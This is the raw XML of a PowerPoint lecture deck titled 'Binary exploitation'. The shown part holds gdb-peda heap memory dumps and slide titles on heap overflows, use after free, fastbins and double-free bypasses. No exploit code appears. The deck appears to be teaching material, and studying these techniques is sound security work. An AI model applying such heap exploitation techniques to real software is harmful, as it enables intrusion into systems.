              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x000000b8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ x/4xw 0x56558178-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558170:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x000000b9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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8" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235464A1-839C-4FD5-BD6B-F1D0A82E9649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-456728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Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>layout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" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41EC4903-2CF9-4860-BE86-D5A0DF4EBF89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538536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malloc,free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calloc,realloc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0" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4888CF-B0A2-413C-ABAD-D56C3E6C9F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363267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Exploitation primitive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEBF5BA5-CBEA-4654-ACC1-818EA371A767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5668020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Heap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is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predictable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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CAD1760-240D-4BE4-8067-547521BDC5ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7751912" y="0"/>
            <a:ext cx="2520280" cy="864096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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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4" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC69A6E1-F076-4BBD-8125-72EF1D4016CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9797504" y="0"/>
            <a:ext cx="2851224" cy="86409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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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FBA5CDED-AEE9-4D47-8A66-29959E14A836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2412593988"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Technologie informatique 16:9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1788_TF02901026_TF02901026.potx" id="{5B96A3B2-8F6C-4C57-AD71-65ECFD3B95A9}" vid="{BBAB43E6-1C62-4FD6-865E-EDACF7274DEC}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Thème Offic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1566889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2012-05-23T08:44:00+00:00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TP102901017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836753</LocLastLocAttemptVersionLookup>
    <IsSearchable xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">true</IsSearchable>
    <TemplateTemplateType xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">PowerPoint Design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REDMOND\v-anij</DisplayName>
        <AccountId>2469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098515-0C12-46CF-BC7C-69B4A13CD5FA}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="4873beb7-5857-4685-be1f-d57550cc96cc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46CFF6F-D9AA-4BC0-911A-0A13567719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5C6E15-39DC-470B-9445-F754B94580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technologique circuit imprimé pour professionnels (grand écran)</Template>
  <TotalTime>0</TotalTime>
  <Words>3757</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>1179</Paragraphs>
  <Slides>74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74</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="78" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Candara</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Technologie informatique 16:9</vt:lpstr>
      <vt:lpstr>Binary exploitation</vt:lpstr>
      <vt:lpstr>whoami</vt:lpstr>
      <vt:lpstr>Sommaire</vt:lpstr>
      <vt:lpstr>Memory layout</vt:lpstr>
      <vt:lpstr>malloc, free, calloc, realloc</vt:lpstr>
      <vt:lpstr>Exploitation primitive</vt:lpstr>
      <vt:lpstr>Heap is predictable</vt:lpstr>
      <vt:lpstr>A chunk in a nutshell</vt:lpstr>
      <vt:lpstr>A chunk in a nutshell</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Trivial heap overflow</vt:lpstr>
      <vt:lpstr>Uninitialized variable</vt:lpstr>
      <vt:lpstr>Uninitialized variable</vt:lpstr>
      <vt:lpstr>Uninitialized variable</vt:lpstr>
      <vt:lpstr>Uninitialized variable</vt:lpstr>
      <vt:lpstr>Uninitialized variable</vt:lpstr>
      <vt:lpstr>Uninitialized variable</vt:lpstr>
      <vt:lpstr>Uninitialized variable</vt:lpstr>
      <vt:lpstr>Uninitialized variable</vt:lpstr>
      <vt:lpstr>Fastbins</vt:lpstr>
      <vt:lpstr>Fastbins : example</vt:lpstr>
      <vt:lpstr>Fastbins : example</vt:lpstr>
      <vt:lpstr>Fastbins : example</vt:lpstr>
      <vt:lpstr>Fastbins : example</vt:lpstr>
      <vt:lpstr>GEF: GDB Enhanced Features</vt:lpstr>
      <vt:lpstr>Use after free</vt:lpstr>
      <vt:lpstr>Use after free</vt:lpstr>
      <vt:lpstr>Use after free</vt:lpstr>
      <vt:lpstr>Use after free</vt:lpstr>
      <vt:lpstr>Use after free</vt:lpstr>
      <vt:lpstr>Use after free</vt:lpstr>
      <vt:lpstr>Use after free</vt:lpstr>
      <vt:lpstr>Use after free</vt:lpstr>
      <vt:lpstr>Bonus: Leaking memory</vt:lpstr>
      <vt:lpstr>Double free corruption : concepts</vt:lpstr>
      <vt:lpstr>Double free corruption : concepts</vt:lpstr>
      <vt:lpstr>Double free corruption : concepts</vt:lpstr>
      <vt:lpstr>Double free corruption : security</vt:lpstr>
      <vt:lpstr>Double free corruption : security</vt:lpstr>
      <vt:lpstr>Double free corruption : concepts</vt:lpstr>
      <vt:lpstr>Double free corruption : bypass</vt:lpstr>
      <vt:lpstr>Double free corruption : bypass</vt:lpstr>
      <vt:lpstr>Double free corruption : bypass</vt:lpstr>
      <vt:lpstr>Double free corruption : bypass</vt:lpstr>
      <vt:lpstr>Double free corruption : bypass</vt:lpstr>
      <vt:lpstr>Double free corruption : bypass</vt:lpstr>
      <vt:lpstr>Double free corruption : exploit case</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption : reality</vt:lpstr>
      <vt:lpstr>Double free corruption : reality</vt:lpstr>
      <vt:lpstr>Double free corruption : reality</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Double free corruption</vt:lpstr>
      <vt:lpstr>Some bytes overflow</vt:lpstr>
      <vt:lpstr>Some bytes overflow</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Références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2018-12-09T18:00:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-14T13:35:55Z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